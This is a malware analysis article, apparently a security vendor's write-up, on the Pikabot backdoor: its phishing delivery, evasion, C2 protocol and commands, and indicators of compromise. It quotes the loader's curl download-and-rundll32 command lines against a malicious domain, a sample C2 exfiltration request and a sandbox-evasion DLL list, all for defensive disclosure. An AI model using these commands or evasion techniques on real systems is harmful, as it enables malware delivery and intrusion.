Pikabot Backdoor
September 21, 2024
Pikabot is a modular backdoor malware, first detected in early 2023. Being a novice on a threat landscape, it quickly gained popularity over others, and became particularly famous as a substitute for the infamous QakBot. Flexibility of the final payload, along with the selection of auxiliary software, continuous development and tricky delivery methods make it a serious contender and a major security threat.
The main application for the Pikabot is the initial access provision in high-end cyberattacks. The backdoor is used to deploy exploit kits like Cobalt Strike, ransomware or other malware tools that may be used in the attack. Such sophisticated payloads obviously make up for the spreading methods and the activity scale of the malware.
Let’s dive into how Pikabot works, starting with the way it infiltrates into the system, and going to the key action – remote access and payload deployment.
Pikabot Spreading Ways
The main tactic for gaining initial access for Pikabot is spear phishing. As we mentioned above, this malware is mainly used in targeted attacks on companies, so opting for the most effective and convincing method is a must. Massive spreading is not a king there, however, it may be used in further attacks.
For a style of spam emails, the malware most commonly uses a routine workflow mailing topics – documents, paper work, reports and so forth. At some point, threat actors started using a technique called thread hijacking, which confuses people into thinking the email from attackers is a genuine part of the conversation. Such email messages contain an attached MS Office document, a PDF file or an archive. By launching the attachment, an unsuspecting victim was initiating the attack chain.
Analysis uncovers several approaches in deploying the actual payload, that depend on the format of the attached file. When it is an archive, the malware is often already inside, and the unsuspecting victim is lured into running a script that launches it. The said script is disguised as a document, but the file in fact has a double extension – docx.lnk, for example. It is made to run a DLL file stored in the same archive.
In case of a PDF file attached to the email message, the content of the said file usually mimics an error message that asks to download the original one from the link. One particular case used a OneDrive error message and asked to get the file “from the cloud storage”. Following the instruction initiates the downloading of the script that connects the remote server, downloads and runs the payload.
Malvertising is the alternative approach, used much less often than email spam, probably due to the lack of targeting precision. This method bears on the faulty filtering of advertisements provided by major ad providers, like Google or Meta. By parasitizing on the names of free software, drivers and some specific tools, hackers lure the user into downloading and installing the malware on their own.
Pikabot Technical Analysis
As we mentioned in previous paragraphs, Pikabot is typically delivered by a loader script. The latter employs a rather tricky approach to deliver the malware’s DLL and execute it. Malware creates a folder in the system directory and downloads a DAT file, using a Curl command. The downloaded file is then saved as a library – this is, exactly, Pikabot.
C:\Windows\System32\cmd.exe" /c mkdir C:\Gofkvlgdigt\Ekfgihcifmv & curl hxxps://ucakbiletsorgulama.com/U14/0.16930199040452631.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll
The script likely carries a selection of backup payload sources, which it will try to execute until the malware is successfully downloaded. After that, the script performs a callout to the rundll32.exe process to launch the downloaded DLL.
"C:\Windows\System32\cmd.exe" /c timeout 10 & rundll32 C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll,Enter
Launch, Detection and Analysis Evasion
The activity of Pikabot begins with its execution with performing the basic set of checkups. First, the malware ensures that it is not running in the debug environment using the WinAPI call NtQueryInformationProcess. If this check returns a false value, malware continues the execution by decrypting and running the rest of its DLL file. Then, another round of anti-analysis checks happens, primarily aiming at evading virtual machines and sandboxes.
List of DLLs Pikabot searches for during anti-analysis:
- Cmdvrt.32.dll
- cmdvrt.64.dll
- Cuckoomon.dll
- Pstorec.dll
- avghookx.dll
- Avghooka.dll
- Snxhk.dll
- api_log.dll
- Dir_watch.dll
- Wpespy.dll
Upon finishing this check, the malware proceeds by assembling the core from several different pieces scattered in an encrypted form across the .data section of the DLL. After decrypting these pieces using unique hardcoded RC4 keys, malware performs a process hollowing trick to the ctfmon.exe process. In fact, it may use a different one for this purpose.
It is worth noting that detection evasion tricks do not stop here. Pikabot continues to check for the signs of a debugger/sandbox after almost every networking operation, as well as some of the local activities.
Execution and Fingerprinting
Once the malware core is loaded, Pikabot starts with resolving APIs, but not in a usual manner. In order to avoid the detection, it calls for the needed API directly, using its hash, instead of the conventional resolution methods. And this tricky practice is used only for the first 3 ones needed by the malware – GetProcAddress, HeapFree and LoadLibraryA. After this step, Pikabot switches to the dynamic API resolution – a rather common practice among malware that tries to avoid EDR/XDR detection.
At this point, malware switches to gathering system information. The procedure goes through another check: if malware detects a system language set to one from the banlist, it ceases further execution. Most of samples have this list filled with languages of ex-USSR countries, which gives a hint on the malware's origin country. After passing it, Pikabot gathers a selection of system properties – most likely in order to fingerprint the system. Below is the list of data it grabs before the initial C2 connection – a rather typical set of data for a backdoor malware.
- Username
- Computer name
- Display info
- Window Dimensions
- CPU info
- Physical/Virtual memory
- Domain controller name
- OS version
- Snapshot of its own process
C2 Communication & Malware Delivery
The data collected during the previous step is sent to the command server using HTTP POST request over HTTPS protocol. Malware tries to evade detection by performing its communications via unusual ports, ones that are typically not listened to by NDR solutions. The request in total looks like this:
POST hxxps://15.235.47.80:23399/api/admin.teams.settings.setIcon HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Accept: */* Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.8 User-Agent: Microsoft Office/14.0 (Windows NT 6.1; Microsoft Outlook 14.0.7166; Pro) Content-Length: 6778 Host: 158.220.80.167:2967 00001a7600001291000016870000000cbed67c4482a40ad2fc20924a06f614a40256fca898d6d2e88eecc638048874a8524d73037ab3b003be6453b7d3971ef2d449e3edf6c04a9b8a97e149a614ebd34843448608687698bae262d662b73bb316692e52e5840c51a0bad86e33c6f8926eb850c2
In return, Pikabot would receive a command that consists of ID and supplementary data. Some of the functions duplicate each other, and some are not even functional, meaning that this part of the malware is still under development.
| Function code | Description |
|---|---|
| 0x1A5A | Stop Pikabot execution |
| 0x246F | Spawns its copy and changes the registry to correspond this new file* |
| 0xACB | Execute a command* ** |
| 0x240, 0x359, 0x3A6 | Duplicate the previous one (0xACB) |
| 0x792 | Inject a shellcode into a process* |
| 0x36C | Inject a PE into a process* |
| 0x985 | List the processes in the system** |
| 0x2672, 0x982 | Empty functions |
* – command comes with supplementary data
** – the result is sent back to the C2
Cyberattacks With The Use of Pikabot
Being a particularly young malware, Pikabot cannot boast of a large track record. To make matters worse, it was in the shadow of Qbot till August 2023. Only after the takedown of once the biggest botnet attackers turned their attention to Pikabot – and it already managed to make some fame.
One particular malware campaign features Black Basta ransomware deployment. Sure enough, it was not a direct action: the research uncovered the deployment of a Cobalt Strike beacon by a Pikabot botnet, led by Water Curupira threat actor. The said beacon was under control of a ransomware gang. It is worth noting that Curupira was earlier noticed spreading IceID banker and DarkGate loader, i.e. it definitely has enough connections in the cybercrime world to make use of every single merit of Pikabot.
Pikabot Indicators of Compromise
IP Addresses
| 15.235.202.109:2226 | 15.235.44.231:5938 | 15.235.45.155:2221 |
| 15.235.47.206:13783 | 15.235.47.80:23399 | 154.221.30.136:13724 |
| 154.61.75.156:2078 | 210.243.8.247:23399 | 210.243.8.247:23399 |
| 65.20.78.68:13721 | 139.180.216.25:2967 | 51.195.232.97:13782 |
| 51.68.147.114:2083 | 51.79.143.215:13783 | 64.176.5.228:13783 |
| 64.176.67.194:2967 | 158.247.253.155:2225 | 139.180.216.25:2967 |
| 70.34.209.101:13720 | 172.233.156.100:13721 | 154.92.19.139:2222 |
| 154.61.75.156:2078 | 137.220.55.190:2223 | 154.92.19.139:2222 |
| 188.26.127.4:13785 | 154.221.30.136:13724 | 137.220.55.190:2223 |
| 70.34.209.101:13720 | 154.92.19.139:2222 | 172.233.156.100:13721 |
| 154.61.75.156:2078 | 192.121.17.70:80 | 198.254.200.65:80 |
Hashes
MD5: 70e21c85d241bc5c7e1e41b6bb709ce0 MD5: fb2729cb59a5bc0420425ea693d26190 MD5: 527774acc9e68d3274e0806873b5c88d MD5: 9a5a5b5f803d25de3e691e7dc53bb1c2 MD5: cafe2d4bd0ed1a67d84f33aca3cf4d1f MD5: bcc53210e13294cbd6a8172558d99295 MD5: 4b1518535af6344af39bd90aa02a6c0d MD5: 4c94707bdcf5c18307c69c9c6fe7a536 SHA256: eead7f5b6f1282ad988238cc8c39292fa99ea416f7793038a20e5caabe93112a SHA256: 7e85b9d1d09301d8b3f48df44159347d89cb3c798d0436b5e9b060df4072b8c7 SHA256: 46e0fe3a942bb1f9aa9cd1b460ca7efa9acddb3c5b2d2bc3b42a87d8463f1c66 SHA256: 2bd1ee56ffd2bbeb6f4dd80783aa476d98faa946c4284b661e5c79f25c62ef79 SHA256: e2773b171d3bd55901647d406fc3de00c7a51bfe2f250667868948fe40fadc47 SHA256: dd2b6e3aa75de8460730862f2dc739537734a7dfc9e673b6a23ee58430348ddf SHA256: 238dcc5611ed9066b63d2d0109c9b623f54f8d7b61d5f9de59694cfc60a4e646 SHA256: a519b9d032a342985bfe1fa3f1244f1db6699805d7883139a8245eba1c2e5dab
MITRE ATT&CK
| Indicator | Description |
|---|---|
| T1566 | Phishing |
| T1204.001 | User Execution: Malicious Link |
| T1620 | Reflective Code Loading |
| T1082 | System Information Discovery |
| T1055 | Process Injection |
| T1573 | Encrypted Channel |